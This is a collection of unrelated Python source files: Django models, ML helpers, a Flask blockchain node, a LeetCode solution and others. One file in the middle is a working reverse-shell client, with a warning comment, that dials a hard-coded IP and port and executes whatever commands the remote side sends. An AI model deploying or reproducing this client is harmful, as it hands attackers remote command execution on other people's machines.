                    try:
                        path = nx.dijkstra_path(doc_graph, from_ind, to_ind, "weight")
                    except nx.exception.NetworkXNoPath:
                        continue
                    path_len = len(path) - 1
                    if (min_length is None) or (path_len < min_length):
                        min_length = path_len
                        min_path = path
            if min_path is None:
                # Dump the graph for debugging before bailing out.
                # NOTE(review): the graph is drawn twice (error.png and
                # error2.png) with identical content -- confirm intended.
                draw_document_graph(document_item, "error.png")
                draw_document_graph(document_item, "error2.png")
                print("Document graph is dumped in error.png")
                print("Entities are: {}".format(document_item["entities"]))
                raise Exception("No shortest path between entity {} and {}".format(i_ent1, i_ent2))
            min_paths[i_ent1, i_ent2] = min_path
    return PatternPairwiseShortestPath(doc_graph, len(document_item["entities"]),
        min_paths)
if __name__ == "__main__":
    # Demo: print each training document's entities, raw text, and the
    # lemma-level shortest paths between its entity pairs.
    from util import load_data

    items, indmap, _observed_tuples, arities = load_data("wikismall.data.json", tuple_type="ent_index")
    for key in items["train"]:
        sample_doc = items["train"][key]["docs"][0]
        tokens = [node["label"]
                  for sent in sample_doc["sentences"]
                  for node in sent["nodes"]]
        raw_sent = " ".join(tokens)
        ents = list(sample_doc["entities"])
        print(ents)
        print(raw_sent)
        pair = extract_pairwise_shortest_paths(sample_doc)
        for sp in pair.get_subpaths():
            print(sp)
        print("==============================")
        input()  # pause between documents
|
from django.db import models
from posts.models import Post
import uuid
from main import models as mainModels
from main import utils
class Comment(models.Model):
    """A comment attached to a Post, with a denormalized JSON author."""
    type = "comment"  # fixed object-type tag used by API serialization
    id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
    # Author is stored as raw JSON rather than a foreign key.
    author = models.JSONField()
    comment = models.TextField(blank=True, null=True)
    published = models.DateTimeField(auto_now_add=True)
    post = models.ForeignKey(Post, on_delete=models.CASCADE)
    # Supported content types for the comment body.
    CT_MARKDOWN = 'text/markdown' # CommonMark
    CT_PLAIN = 'text/plain' # utf-8
    CT_HTML = 'text/html' # TODO: strip tags
    CT_BASE64 = 'application/base64'
    CT_PNG = 'image/png;base64' # embedded png
    CT_JPG = 'image/jpeg;base64' # embedded jpeg
    CONTENT_TYPE_CHOICES = [
        ('Text', (
            (CT_MARKDOWN, 'markdown'),
            (CT_PLAIN, 'plain'),
            (CT_HTML, 'html'),
        )),
        ('Encoded Text', (
            (CT_BASE64, 'base64'),
        )),
        ('Image', (
            (CT_PNG, '.png'),
            (CT_JPG, '.jpg'),
        )),
    ]
    contentType = models.CharField(
        max_length=18,
        choices=CONTENT_TYPE_CHOICES,
        default=CT_MARKDOWN
    )

    def get_id_url(self):
        """Return the canonical frontend URL of this comment."""
        return f'{utils.FRONTEND_HOST}/author/{str(self.post.author.id)}/posts/{str(self.post.id)}/comments/{self.id}'
|
# Sum values typed by the user until the sentinel 999 is entered,
# then report the total and how many values were summed.
total = 0
count = 0
value = int(input("Digite o valor inicial: "))
while value != 999:
    total += value
    count += 1
    value = int(input("Digite o valor para continuar a soma: "))
print('O valor total somado foi: {}\nForam digitados: {} numeros'.format(total, count))
|
"""
Copyright 2018-2021 Board of Trustees of Stanford University
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
#!/usr/bin/python3
import matplotlib.image as mpimg
import numpy as np
import base64
import sys
import os
def main():
    """Read an image, flatten it to float32, and print its base64 encoding.

    Usage: ./img_to_base64.py <image-path>
    The base64 string is printed to stdout for the caller to capture.
    Exits with status 1 on a missing argument or invalid path.
    """
    if len(sys.argv) != 2:
        print("Usage: ./img_to_base64.py <image-path>")
        sys.exit(1)
    image_path = sys.argv[1]
    if not os.path.exists(image_path):
        print(image_path, "is not a valid path")
        sys.exit(1)
    img = mpimg.imread(image_path)
    img_flatten = img.flatten().astype(np.float32)
    img_bytes = img_flatten.tobytes()
    # Bug fix: str(b64encode(...)) produced "b'...'" -- the bytes repr with
    # its prefix and quotes embedded. Decode to get the clean base64 text.
    b64_string = base64.b64encode(img_bytes).decode('ascii')
    # Print for caller to grab
    print(b64_string)


if __name__ == '__main__':
    main()
|
"""
This script creates a unittest that tests Categorical policies in
metarl.tf.policies.
"""
import gym
import pytest
from metarl.envs import MetaRLEnv, normalize
from metarl.experiment import LocalTFRunner
from metarl.np.baselines import LinearFeatureBaseline
from metarl.tf.algos import TRPO
from metarl.tf.optimizers import ConjugateGradientOptimizer
from metarl.tf.optimizers import FiniteDifferenceHvp
from metarl.tf.policies import CategoricalGRUPolicy
from metarl.tf.policies import CategoricalLSTMPolicy
from metarl.tf.policies import CategoricalMLPPolicy
from tests.fixtures import snapshot_config, TfGraphTestCase
# All categorical policy implementations to exercise.
policies = [CategoricalGRUPolicy, CategoricalLSTMPolicy, CategoricalMLPPolicy]


class TestCategoricalPolicies(TfGraphTestCase):

    @pytest.mark.parametrize('policy_cls', [*policies])
    def test_categorical_policies(self, policy_cls):
        """Smoke-test one TRPO training epoch for each categorical policy."""
        with LocalTFRunner(snapshot_config, sess=self.sess) as runner:
            cartpole = MetaRLEnv(normalize(gym.make('CartPole-v0')))
            agent = policy_cls(name='policy', env_spec=cartpole.spec)
            linear_baseline = LinearFeatureBaseline(env_spec=cartpole.spec)
            algo = TRPO(
                env_spec=cartpole.spec,
                policy=agent,
                baseline=linear_baseline,
                max_path_length=100,
                discount=0.99,
                max_kl_step=0.01,
                optimizer=ConjugateGradientOptimizer,
                optimizer_args=dict(
                    hvp_approach=FiniteDifferenceHvp(base_eps=1e-5)),
            )
            runner.setup(algo, cartpole)
            runner.train(n_epochs=1, batch_size=4000)
            cartpole.close()
|
"""
created: mcclayac
Company Name : BigMAN Software
MyName: Tony McClay
date: 11/23/18
day of month: 23
Project Name: 20PythonLibraries
filename:
package name:
IDE: PyCharm
"""
import dominate
from dominate.tags import *
# Build a small demo page with dominate, print it, and save it to disk.
doc = dominate.document(title='Dominate your HTML')

with doc.head:
    link(rel='stylesheet', href='style.css')
    script(type='text/javascript', src='script.js')

with doc:
    # Navigation list in the header.
    with div(id='header').add(ol()):
        for page in ('home', 'about', 'contact'):
            li(a(page.title(), href='/%s.html' % page))
    # Page body.
    with div():
        attr(cls='body')
        p('Lorem ipsum..')

print(doc)

with open("./dominate.html", 'w') as f:
    f.write(str(doc))
|
###############################################################################
# Copyright 2015 University of Florida. All rights reserved.
# This file is part of the BlueButton.py project.
# Use of this source code is governed by the license found in the LICENSE file.
###############################################################################
"""
Parser for the CCDA functional & cognitive status
"""
from ... import documents
from ...core import wrappers
def functional_statuses(ccda):
    """Parse the functional-status section of a CCDA document.

    Returns a ListWrapper of ObjectWrapper records, one per entry, each
    carrying the entry date and the coded status value.
    """
    parse_date = documents.parse_date
    results = wrappers.ListWrapper()
    section = ccda.section('functional_statuses')
    for entry in section.entries():
        # Prefer the direct effectiveTime value; fall back to its <low> child.
        date = parse_date(entry.tag('effectiveTime').attr('value'))
        if not date:
            date = parse_date(entry.tag('effectiveTime').tag('low').attr('value'))
        value_el = entry.tag('value')
        results.append(wrappers.ObjectWrapper(
            date=date,
            name=value_el.attr('displayName'),
            code=value_el.attr('code'),
            code_system=value_el.attr('codeSystem'),
            code_system_name=value_el.attr('codeSystemName')
        ))
    return results
|
# -*- coding:utf-8 -*-
from __future__ import unicode_literals

# Tells Django which AppConfig to use for this package (pre-3.2 convention).
default_app_config = 'marchena.modules.attachments.apps.AttachmentsConfig'
|
# Definition for a binary tree node.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val      # node payload
        self.left = left    # left child (TreeNode or None)
        self.right = right  # right child (TreeNode or None)
class Solution:
    """Count "good" nodes: nodes whose value is >= every value on the path
    from the root down to them (LeetCode 1448)."""

    def goodNodes(self, root: "TreeNode") -> int:
        """Return the number of good nodes in the tree rooted at ``root``.

        Assumes ``root`` is not None (guaranteed by the problem statement).
        """
        return self.bfs(root)

    def bfs(self, root):
        """Level-order walk carrying the running path maximum per node.

        Uses a deque of (node, path_max) pairs: the original kept two
        parallel lists and called list.pop(0), which is O(n) per pop and
        made the traversal O(n^2) overall.
        """
        from collections import deque  # local import keeps the snippet self-contained
        queue = deque([(root, root.val)])
        good = 0
        while queue:
            node, path_max = queue.popleft()
            if node.val >= path_max:
                good += 1
                path_max = node.val  # this node becomes the new path maximum
            if node.left:
                queue.append((node.left, path_max))
            if node.right:
                queue.append((node.right, path_max))
        return good
|
import socket
import os
import subprocess

# SECURITY WARNING: this script is a reverse shell. It dials out to a
# hard-coded host/port and executes arbitrary commands sent by the remote
# peer with shell=True. Only run against machines you own, for authorized
# testing or education; never deploy on systems without consent.
s = socket.socket()
host = '10.2.242.190'  # controller address (hard-coded)
port = 9999            # controller port
s.connect((host, port))
while True:
    data = s.recv(1024)
    # 'cd' must be handled in-process: a child shell's cwd change is lost.
    if data[:2].decode("utf-8") == 'cd':
        os.chdir(data[3:].decode("utf-8"))
    if len(data) > 0:
        cmd = subprocess.Popen(data[:].decode("utf-8"), shell=True, stdout=subprocess.PIPE, stdin=subprocess.PIPE, stderr=subprocess.PIPE)
        output_byte = cmd.stdout.read() + cmd.stderr.read()
        output_str = str(output_byte, "utf-8", errors="ignore")
        # Append a prompt-like cwd marker for the controller's display.
        currentWD = os.getcwd() + "> "
        s.send(str.encode(output_str + currentWD))
        print(output_str)
import django_filters
from cards.models import Card
class CardFilter(django_filters.rest_framework.FilterSet):
    """Filter set for Card list endpoints.

    The four explicit filters below override the default exact-match
    behaviour with case-insensitive substring matching.
    """
    card_name = django_filters.CharFilter(lookup_expr='icontains')
    set_name = django_filters.CharFilter(lookup_expr='icontains')
    type = django_filters.CharFilter(lookup_expr='icontains')
    cost = django_filters.CharFilter(lookup_expr='icontains')

    class Meta:
        model = Card
        # Expose every model field; the explicit declarations above win.
        fields = '__all__'
|
import numpy as np
def project_image_to_rect(uv_depth, P):
    """Back-project image-plane points with depth into the rectified
    camera frame.

    Parameters
    ----------
    uv_depth : (3, N) array of rows (u, v, depth).
    P : (3, 4) camera projection matrix.

    Returns
    -------
    (3, N) array of (x, y, z) camera coordinates; z is the input depth.
    """
    c_u = P[0, 2]  # principal point
    c_v = P[1, 2]
    f_u = P[0, 0]  # focal lengths
    f_v = P[1, 1]
    b_x = P[0, 3] / (-f_u)  # relative baseline offsets
    b_y = P[1, 3] / (-f_v)
    # Pinhole inversion per point (removed an unused point-count local).
    x = ((uv_depth[0] - c_u) * uv_depth[2]) / f_u + b_x
    y = ((uv_depth[1] - c_v) * uv_depth[2]) / f_v + b_y
    return np.stack([x, y, uv_depth[2]], axis=0)
def project_disp_to_depth(points_cam, Proj, baseline=0.54):
    """Convert a (3, W, H, D) (x-pixel, y-pixel, disparity) volume into a
    3D point cloud of the same spatial shape.

    baseline : stereo baseline in meters (KITTI default 0.54).
    """
    xs = points_cam[0:1]
    ys = points_cam[1:2]
    disp = points_cam[2:3]
    _, w, h, d = disp.shape
    valid = disp > 0
    # depth = f * B / disparity; the (1 - valid) term avoids divide-by-zero
    # where disparity is not positive.
    depth = Proj[0, 0] * baseline / (disp + 1. - valid)
    stacked = np.concatenate([xs, ys, depth], axis=0).reshape((3, -1))
    # Back-project into the rectified camera frame, then restore the shape.
    cloud = project_image_to_rect(stacked, Proj)
    return cloud.reshape(3, w, h, d)
def clip_boxes(boxes, size, remove_empty=False):
    """Clamp box coordinates in place to the image bounds.

    boxes : (N, 4) array of [x1, y1, x2, y2].
    size : (width, height) of the image.
    remove_empty : when True, also return a boolean mask of boxes that
        keep positive width and height after clipping.
    """
    max_x = size[0] - 1
    max_y = size[1] - 1
    boxes[:, [0, 2]] = boxes[:, [0, 2]].clip(0, max_x)
    boxes[:, [1, 3]] = boxes[:, [1, 3]].clip(0, max_y)
    if not remove_empty:
        return boxes
    keep = (boxes[:, 3] > boxes[:, 1]) & (boxes[:, 2] > boxes[:, 0])
    return boxes, keep
def get_dimensions(corners):
    """Recover [height, width, length, rotation_y] from a 3D box's corners.

    corners : (3, 8) array; columns are the 8 corners in the ordering the
        edge-pair index groups below assume. Each dimension is the mean of
        its four parallel edges; rotation_y comes from the summed x/z
        components of the length-direction edges.
    """
    assert corners.shape == (3, 8)
    height_pairs = [(0, 4), (1, 5), (2, 6), (3, 7)]
    width_pairs = [(0, 1), (2, 3), (4, 5), (6, 7)]
    length_pairs = [(0, 3), (1, 2), (4, 7), (5, 6)]
    vector_pairs = [(0, 3), (1, 2), (4, 7), (5, 6)]
    height = 0.0
    width = 0.0
    length = 0.0
    vector = np.zeros(2, dtype=np.float32)
    for hp, wp, lp, vp in zip(height_pairs, width_pairs, length_pairs, vector_pairs):
        height += np.linalg.norm(corners[:, hp[0]] - corners[:, hp[1]])
        width += np.linalg.norm(corners[:, wp[0]] - corners[:, wp[1]])
        length += np.linalg.norm(corners[:, lp[0]] - corners[:, lp[1]])
        edge = corners[:, vp[0]] - corners[:, vp[1]]
        vector[0] += edge[0]  # x component
        vector[1] += edge[2]  # z component
    # Average the four parallel edges for each dimension.
    height, width, length = height / 4, width / 4, length / 4
    rotation_y = -np.arctan2(vector[1], vector[0])
    return [height, width, length, rotation_y]
|
import requests
from flask import Flask, jsonify, request
import blockchain as bc
import json
import sys
import rsa
import base64
from uuid import uuid4
# Cryptocurrency is just a private key that "allows" access to account
# NOTE(review): 512-bit RSA is far too weak for anything but a demo.
(pub_key, priv_key) = rsa.newkeys(512)
# Generate a public key unique address for this node
node_identifier = pub_key.save_pkcs1().decode('UTF-8')
# Instantiate the Node
app = Flask(__name__)
# Instantiate the Blockchain
blockchain = bc.Blockchain()
@app.route('/mine', methods=['GET'])
def mine():
    """Mine a new block: run proof-of-work, credit this node the reward,
    and broadcast the forged block to every known peer.

    Relies on the module globals ``addr``/``portn`` set in ``main()``.
    """
    # We run the proof of work algorithm to get the next proof...
    last_block = blockchain.last_block
    last_proof = last_block['proof']
    proof = blockchain.proof_of_work(last_proof)
    # We must receive a reward for finding the proof.
    # The sender is "0" to signify that this node has mined a new coin.
    message = f'0{node_identifier}1'
    signature = rsa.sign(message.encode('UTF-8'),priv_key,'SHA-256')
    blockchain.new_transaction(
        sender="0",
        recipient=node_identifier,
        amount=1,
        signature = base64.b64encode(signature).decode('UTF-8')
    )
    # Forge the new Block by adding it to the chain
    previous_hash = blockchain.hash(last_block)
    block = blockchain.new_block(proof, previous_hash)
    # Broadcast list = our own address plus every peer we know about.
    temp = set()
    temp.add(f'{addr}:{portn}')
    temp.update(blockchain.nodes)
    # NOTE(review): this threshold check runs AFTER the block (including the
    # reward transaction) was already added locally, so returning 400 here
    # still leaves the forged block on the chain -- confirm intended.
    threshold = 100
    temp_sum = sum(blockchain.temp_unspent.values())
    if temp_sum < threshold:
        return 'Not enough transactions', 400
    broadcast = {
        'nodes': list(temp),
        'block': block
    }
    for node in blockchain.nodes:
        requests.post(f'http://{node}/nodes/block/new', json = broadcast)
    response = {
        'message': "New Block Forged",
        'index': block['index'],
        'transactions': block['transactions'],
        'proof': block['proof'],
        'previous_hash': block['previous_hash'],
    }
    return jsonify(response), 200
@app.route('/nodes/block/new', methods=['POST'])
def recieve_block():
    """Validate and adopt a block broadcast by a peer, then re-gossip it
    to any peers the sender did not reach.

    Expects JSON: {'nodes': [notified nodes], 'block': {...}}.
    (The 'recieve' spelling is kept; only the URL matters to callers.)
    """
    values = request.get_json()
    required = ['nodes','block']
    if (values is None or not all(k in values for k in required)):
        return 'Missing values', 400
    required = ['index', 'proof', 'previous_hash','timestamp','transactions']
    if (not all(k in values['block'] for k in required)):
        return 'Missing value in block', 400
    if (not blockchain.accept_block(values['block']['proof'],values['block']['index'],values['block']['previous_hash'],values['block']['timestamp'],values['block']['transactions'])):
        return 'Invalid block', 400
    diff = blockchain.nodes - set(values['nodes'])
    # find nodes that werent notified of transaction
    values['nodes']= list(blockchain.nodes | set(values['nodes']))
    for node in diff :
        # add new nodes to blockchain
        blockchain.register_node(node)
        requests.post(f'http://{node}/nodes/block/new', json = values)
    return 'Block Added', 201
@app.route('/nodes/transactions/new', methods=['POST'])
def new_transaction_internal():
    """Receive a transaction broadcast from a peer node and gossip it on.

    Expects JSON: {'nodes': [already-notified nodes],
                   'transaction': {'sender', 'recipient', 'amount', 'signature'}}
    """
    values = request.get_json()
    # Check that required fields are in the POST'ed data
    required = ['nodes', 'transaction']
    if (values is None or not all (k in values for k in required)):
        return 'Missing values', 400
    required = ['sender', 'recipient', 'amount', 'signature']
    if (not all(k in values['transaction'] for k in required)):
        return 'Missing transaction values', 400
    if (not blockchain.test_transaction(values)):
        return 'Already have transaction', 200
    # Bug fix: the transaction fields live under values['transaction'];
    # the old code read values['sender'] etc. and raised KeyError.
    tx = values['transaction']
    if (not blockchain.valid_transaction(tx['sender'], tx['recipient'], tx['amount'], tx['signature'])):
        return 'Invalid Transaction', 400
    diff = blockchain.nodes - set(values['nodes'])
    # find nodes that werent notified of transaction
    values['nodes'] = list(blockchain.nodes | set(values['nodes']))
    for node in diff:
        # add new nodes to blockchain
        blockchain.register_node(node)
        requests.post(f'http://{node}/nodes/transactions/new', json=values)
    # Create a new Transaction
    index = blockchain.new_transaction(tx['sender'], tx['recipient'], tx['amount'], tx['signature'])
    response = {'message': f'Transaction will be added to Block {index}'}
    return jsonify(response), 201
@app.route('/transactions/new', methods=['POST'])
def new_transaction():
    """Public endpoint: accept a signed transaction from a wallet client,
    record it locally, and broadcast it to all known peer nodes.

    Relies on the module globals ``addr``/``portn`` set in ``main()``.
    """
    values = request.get_json()
    # Check that the required fields are in the POST'ed data
    required = ['sender', 'recipient', 'amount', 'signature']
    if (values is None or not all(k in values for k in required)):
        return 'Missing values', 400
    if (not blockchain.valid_transaction(values['sender'],values['recipient'],int(values['amount']),values['signature'])):
        return 'Invalid Transaction', 400
    # Create a new Transaction
    index = blockchain.new_transaction(values['sender'],values['recipient'],int(values['amount']),values['signature'])
    # Broadcast list = our own address plus every peer we know about.
    temp = set()
    temp.add(f'{addr}:{portn}')
    temp.update(blockchain.nodes)
    # Include nodes broadcasting to so nodes know who it was sent too
    broadcast = {
        'nodes': list(temp),
        'transaction': {
            'sender': values['sender'],
            'recipient': values['recipient'],
            'amount': values['amount'],
            'signature': values['signature']}}
    for node in blockchain.nodes:
        requests.post(f'http://{node}/nodes/transactions/new', json = broadcast)
    response = {'message': f'Transaction will be added to Block {index}'}
    return jsonify(response), 201
@app.route('/chain', methods=['GET'])
def full_chain():
    """Return the full chain plus any not-yet-mined transactions."""
    payload = {
        'transactions': blockchain.current_transactions,
        'chain': blockchain.chain,
        'length': len(blockchain.chain)
    }
    return jsonify(payload), 200
@app.route('/nodes/register', methods=['POST'])
def internal_register_nodes():
    """Peer-to-peer endpoint: record the nodes another node tells us about.

    Expects JSON: {'nodes': ['http://host:port', ...]}.
    """
    values = request.get_json()
    if values is None:
        return "Error: Please provide some json",400
    nodes = values.get('nodes')
    if nodes is None:
        return "Error: Please supply a valid list of nodes", 400
    # Bug fix: the supplied nodes were validated but never registered,
    # so the "New nodes have been added" response was inaccurate.
    for node in nodes:
        blockchain.register_node(node)
    response = {
        'message': 'New nodes have been added',
        'total_nodes': list(blockchain.nodes),
    }
    return jsonify(response), 201
@app.route('/register', methods=['POST'])
def external_register_nodes():
    """Public endpoint: join the given peers, introducing ourselves to each
    one via its internal /nodes/register endpoint.

    Relies on the module globals ``addr``/``portn`` set in ``main()``.
    """
    values = request.get_json()
    if values is None:
        return "Error: Please provide some json",400
    nodes = values.get('nodes')
    if nodes is None:
        return "Error: Please supply a valid list of nodes", 400
    # Our own address, so each peer can register us back.
    request_body = {
        "nodes" : [f'http://{addr}:{portn}']
    }
    for node in nodes:
        blockchain.register_node(node)
        requests.post(f'{node}/nodes/register', json = request_body)
    response = {
        'message': 'New nodes have been added',
        'total_nodes': list(blockchain.nodes),
    }
    return jsonify(response), 201
@app.route('/nodes/resolve', methods=['GET'])
def consensus():
    """Run the conflict-resolution algorithm and report the outcome."""
    was_replaced = blockchain.resolve_conflicts()
    if was_replaced:
        payload = {
            'message': 'Our chain was replaced',
            'new_chain': blockchain.chain
        }
    else:
        payload = {
            'message': 'Our chain is authoritative',
            'chain': blockchain.chain
        }
    return jsonify(payload), 200
# This will probably be used by the website and mobile
# to turn an ip address into a node identifier
@app.route('/identifier', methods=['GET'])
def identity():
    """Expose this node's public-key identifier."""
    return jsonify({'address': node_identifier}), 200
# Retrieves a user's unspent coin balance
@app.route('/balance', methods=['POST'])
def balance():
    """Return the unspent balance for each requested public key.

    Expects JSON: {'keys': [...]}; unknown keys report a balance of 0.
    """
    values = request.get_json()
    if values is None:
        return "Error: Please provide some json",400
    keys = values.get('keys')
    if keys is None:
        return "String missing parameter key.", 400
    response = {'balance': [blockchain.unspent.get(key, 0) for key in keys]}
    return jsonify(response), 200
def main(host,port):
    """
    Starts up the server
    :param host: <str> The host address of the server
    :param port: <int> The port that the server is listening to
    """
    # Record the bind address in module globals so the /register route can
    # advertise this node's own URL to its peers.
    global portn
    global addr
    portn=port
    addr=host
    # Blocking call: runs the Flask development server.
    app.run(host=host, port=port)
|
from django.urls import include, path
from bbbs.story.views import StoryList
# Routes that are nested under the versioned API prefix below.
extra_patterns = [
    path("story/", StoryList.as_view(), name="stories"),
]
# Top-level URL configuration: everything is served under /v1/.
urlpatterns = [
    path("v1/", include(extra_patterns)),
]
|
from django.contrib.auth.models import (
AbstractBaseUser,
BaseUserManager,
PermissionsMixin,
)
from django.utils import timezone
from django.core.mail import send_mail
from django.utils.translation import ugettext_lazy as _
from django.db import models
class UserManager(BaseUserManager):
    """
    A custom user manager to deal with emails as unique identifiers for auth
    instead of usernames. The default that's used is "UserManager"
    """
    use_in_migrations = True
    def _create_user(self, email, password, **extra_fields):
        """
        Create and save a user with the given email, and password.

        Raises:
            ValueError: if no email is supplied.
        """
        if not email:
            # Bug fix: the identifier here is the email address, not a
            # username, so say so in the error message.
            raise ValueError('The given email must be set')
        email = self.normalize_email(email)
        user = self.model(email=email, **extra_fields)
        user.set_password(password)
        user.save(using=self._db)
        return user
    def create_user(self, email=None, password=None, **extra_fields):
        """Create a regular (non-staff, non-superuser) user."""
        extra_fields.setdefault('is_staff', False)
        extra_fields.setdefault('is_superuser', False)
        return self._create_user(email, password, **extra_fields)
    def create_superuser(self, email, password, **extra_fields):
        """Create a superuser; is_staff/is_superuser must not be disabled."""
        extra_fields.setdefault('is_staff', True)
        extra_fields.setdefault('is_superuser', True)
        if extra_fields.get('is_staff') is not True:
            raise ValueError('Superuser must have is_staff=True.')
        if extra_fields.get('is_superuser') is not True:
            raise ValueError('Superuser must have is_superuser=True.')
        return self._create_user(email, password, **extra_fields)
class User(AbstractBaseUser, PermissionsMixin):
    """Custom user model that authenticates by unique email, not username."""
    email = models.EmailField(unique=True)
    first_name = models.CharField(_('first name'), max_length=30, blank=True)
    last_name = models.CharField(_('last name'), max_length=150, blank=True)
    is_staff = models.BooleanField(
        _('staff status'),
        default=False,
        help_text=_(
            'Designates whether the user can log into this admin site.'),
    )
    is_active = models.BooleanField(
        _('active'),
        default=True,
        help_text=_(
            'Designates whether this user should be treated as active. '
            'Unselect this instead of deleting accounts.'),
    )
    date_joined = models.DateTimeField(_('date joined'), default=timezone.now)
    # Custom manager handling email-based creation (defined above).
    objects = UserManager()
    EMAIL_FIELD = 'email'
    USERNAME_FIELD = 'email'
    # Email/password are always required; nothing else is prompted for.
    REQUIRED_FIELDS = []
    class Meta:
        verbose_name = _('user')
        verbose_name_plural = _('users')
    def __str__(self):
        return self.email
    def clean(self):
        # Normalize the email (lowercases the domain part) on validation.
        super().clean()
        self.email = self.__class__.objects.normalize_email(self.email)
    def get_full_name(self):
        """
        Return the first_name plus the last_name, with a space in between.
        """
        full_name = '%s %s' % (self.first_name, self.last_name)
        return full_name.strip()
    def get_short_name(self):
        """Return the short name for the user."""
        return self.first_name
    def email_user(self, subject, message, from_email=None, **kwargs):
        """Send an email to this user."""
        send_mail(subject, message, from_email, [self.email], **kwargs)
|
# Copyright (c) 2016 PaddlePaddle Authors. All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from paddle.proto.DataConfig_pb2 import DataConfig
# Trainer configuration captured by get_config_funcs() below.
g_config = None
def SimpleData(files=None,
               feat_dim=None,
               context_len=None,
               buffer_capacity=None):
    """Build a DataConfig proto for the 'simple' data provider.

    :param files: file list for the data provider
    :param feat_dim: feature dimension
    :param context_len: optional context window length
    :param buffer_capacity: optional buffer capacity
    """
    data_config = DataConfig()
    data_config.type = 'simple'
    data_config.files = files
    data_config.feat_dim = feat_dim
    if context_len is not None:
        data_config.context_len = context_len
    # NOTE(review): this truthiness test skips buffer_capacity == 0, unlike
    # the explicit `is not None` check above -- confirm whether 0 should be
    # honored as a valid capacity.
    if buffer_capacity:
        data_config.buffer_capacity = buffer_capacity
    return data_config
def get_config_funcs(trainer_config):
    """Record the trainer config and expose the data-config constructors."""
    global g_config
    g_config = trainer_config
    funcs = {'SimpleData': SimpleData}
    return funcs
|
# -*- coding: utf-8 -*-
"""app Description
This module does great things.
"""
import os
import tempfile
import subprocess
import shutil
# Implementation constants
# Header stamped at the top of every generated alias script; the three
# format placeholders are FILE, DESCRIPTION, and USAGE (in that order).
BASH_SCRIPT_HEADER = """#!/bin/bash
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
# FILE:{}
# DESCRIPTION:{}
# USAGE:{}
#%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
"""
def read_file(filename):
    """Return the entire contents of *filename* as a string."""
    with open(filename, "r") as handle:
        return handle.read()
def create_bash_script(filename):
    """Write an empty bash script with the standard header and mark it executable."""
    header = BASH_SCRIPT_HEADER.format(
        filename,
        "",  # DESCRIPTION
        "",  # USAGE
    )
    with open(filename, "w") as script:
        script.write(header)
    os.chmod(filename, 0o755)
# Classes, methods, functions, and variables
class AliashTool():
    """Manage bash alias definitions and their backing shell scripts.

    Each alias is one line ``alias NAME=<script_dir>/NAME.sh`` in the alias
    definition file (e.g. ``~/.bash_aliases``), backed by an executable
    script in ``script_dir``.

    Attributes:
        home_dir (str): user home directory.
        script_dir (str): directory holding the alias ``.sh`` scripts.
        alias_definition_file (str): path to the bash aliases file.
    """
    def __init__(self, home_dir, script_dir, bash_aliases_file):
        self.home_dir = home_dir
        self.script_dir = script_dir
        self.alias_definition_file = bash_aliases_file
    def join_home_dir(self, filename) -> str:
        """Return *filename* joined onto the home directory."""
        return os.path.join(self.home_dir, filename)
    def join_script_dir(self, filename) -> str:
        """Return *filename* joined onto the script directory."""
        return os.path.join(self.script_dir, filename)
    def _get_current_scripts_in_script_dir(self) -> list:
        """List absolute paths of all ``.sh`` files in the script dir."""
        return [os.path.join(self.script_dir, i) for i in os.listdir(
            self.script_dir) if i.endswith(".sh")]
    def _get_current_alias_definitions_from_file(self) -> list:
        """Return the non-empty, stripped lines of the alias definition file."""
        alias_definitions = [line.strip() for line in read_file(
            self.alias_definition_file).split("\n") if not line == ""
        ]
        return alias_definitions
    def _get_current_aliases_in_alias_definition_file(self) -> list:
        """Return the alias names parsed from the alias definition file."""
        alias_definition_file_aliases = []
        alias_defs = self._get_current_alias_definitions_from_file()
        for a in alias_defs:
            if "=" in a:
                alias_def = a.split("=")
                alias = alias_def[0].split("alias ")[1]
                alias_definition_file_aliases.append(alias)
        return alias_definition_file_aliases
    def _get_current_scripts_in_alias_definition_file(self) -> list:
        """Return the script paths referenced by the alias definition file."""
        alias_definition_file_scripts = []
        alias_defs = self._get_current_alias_definitions_from_file()
        for a in alias_defs:
            if "=" in a:
                alias_def = a.split("=")
                filename = alias_def[1]
                alias_definition_file_scripts.append(filename)
        return alias_definition_file_scripts
    def _get_db(self) -> dict:
        """Returns {'alias': 'alias_script_path'}"""
        db = {}
        alias_defs = self._get_current_alias_definitions_from_file()
        for a in alias_defs:
            if "=" in a:
                alias_filename = a.split("=")
                # strip the leading "alias " (6 chars), then drop anything
                # after the first space
                alias = alias_filename[0][6:].split(" ")[0]
                filename = alias_filename[1]
                if db.get(alias) is None:
                    db[alias] = filename
                else:
                    print("ERROR: duplicate alias")
        return db
    def _format_alias_definition(self, alias) -> str:
        """Return the bash definition line for *alias*."""
        return "alias {}={}".format(
            alias,
            self.join_script_dir(alias+".sh")
        )
    def remove_file(self, filename):
        """Archive a script by moving it into Utilities/tmp (not deleted)."""
        old_script_dir = os.path.join(self.home_dir, "Utilities/tmp")
        new_filename = filename.replace(self.script_dir, old_script_dir)
        shutil.move(filename, new_filename)
